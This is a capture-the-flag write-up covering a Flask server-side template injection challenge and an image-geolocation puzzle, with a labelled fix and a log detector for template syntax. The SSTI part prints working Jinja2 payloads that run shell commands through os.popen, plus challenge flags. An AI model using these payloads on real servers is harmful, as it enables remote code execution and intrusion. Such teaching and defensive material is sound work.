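Thoughts
I happened to have some free time after getting home from my special-admission interview at National Tsing Hua University, so I poked at this a bit.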
Writeup
OS Detection
A new service has been deployed that uses advanced algorithms to detect your Operating System. What an invasion of privacy! Can you pwn it?
Source Code:
from flask import Flask, request, render_template, render_template_string
from ua_parser import user_agent_parser

app = Flask(__name__)

@app.route("/")
def home():
    user_agent = request.headers.get('User-Agent')
    try:
        parsed_string = user_agent_parser.Parse(user_agent)
        family = parsed_string['os']['family']
        user_agent_hint = render_template_string(user_agent)
        return render_template('index.html', os=family, user_agent=user_agent_hint)
    except Exception as e:
        return render_template('failure.html', error=str(e))

@app.route("/source")
def source():
    code = open(__file__).read()
    return render_template_string("<pre>{{ code }}</pre>", code=code)

if __name__ == "__main__":
    # No debug, that would be insecure!
    #app.run(debug=True)
    app.run()
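The User-Agent header is passed straight into render_template_string as the template source, so user_agent is an SSTI (server-side template injection) vulnerability.
First, ls: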
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}
__pycache__
app.py
flag
requirements.txt
templates
Then try to read the file, and it turns out to be a directory:
{{ get_flashed_messages.__globals__.__builtins__.open("flag").read() }}
[Errno 21] Is a directory: 'flag'
Go into it; there is a flag.txt inside, so read it:
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cd flag && cat flag.txt').read() }}
PP{h4ck3r-OS-d3t3ct3d::Hn5mQK8Nsukp}
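The root cause in home() and its fix, shown side by side as an added example that is not part of the original writeup or the challenge code. It assumes a plain jinja2 Environment with autoescape on as a stand-in for Flask's render_template_string; the function names, the arithmetic probe and the log lines are constructed for illustration.

```python
import re
from jinja2 import Environment

# Flask's render_template_string() compiles its first argument as Jinja2
# source; a bare Environment with autoescape on stands in for it here
# (assumption made so the example runs without a Flask app).
env = Environment(autoescape=True)

def hint_vulnerable(user_agent: str) -> str:
    # Same pattern as the challenge: the header IS the template source.
    return env.from_string(user_agent).render()

def hint_fixed(user_agent: str) -> str:
    # Fixed template; the header is only data bound to a variable.
    return env.from_string("{{ user_agent }}").render(user_agent=user_agent)

# Jinja2 delimiters have no place in a genuine User-Agent string.
TEMPLATE_SYNTAX = re.compile(r"\{\{|\{%|\{#")

def suspicious_user_agents(log_lines):
    """Return User-Agent values (last quoted field of a combined-format
    access log line) that contain template delimiters."""
    hits = []
    for line in log_lines:
        fields = re.findall(r'"([^"]*)"', line)
        if fields and TEMPLATE_SYNTAX.search(fields[-1]):
            hits.append(fields[-1])
    return hits

# Constructed sample input (not taken from the challenge server).
PROBE = "Mozilla/5.0 {{ 7*7 }}"
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET / HTTP/1.1" 200 498 "-" "Mozilla/5.0 {{ 7*7 }}"',
]

if __name__ == "__main__":
    print(hint_vulnerable(PROBE))   # expression is evaluated by the server
    print(hint_fixed(PROBE))        # header is echoed back as inert text
    print(suspicious_user_agents(SAMPLE_LOG))
```

In the challenge app the equivalent fix is to drop the render_template_string(user_agent) call and pass user_agent directly to render_template('index.html', ...) as a variable.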
Fall
Which building can be seen in this pretty fall photo?
The flag should be entered like PP{nameofbuilding}, where nameofbuilding is the name of the pictured building in the language of the country it is in. There are only lowercase letters and no spaces, diacritics or other special characters in the flag.
Sol: Google reverse image search, solved.
PP{orangerieschloss}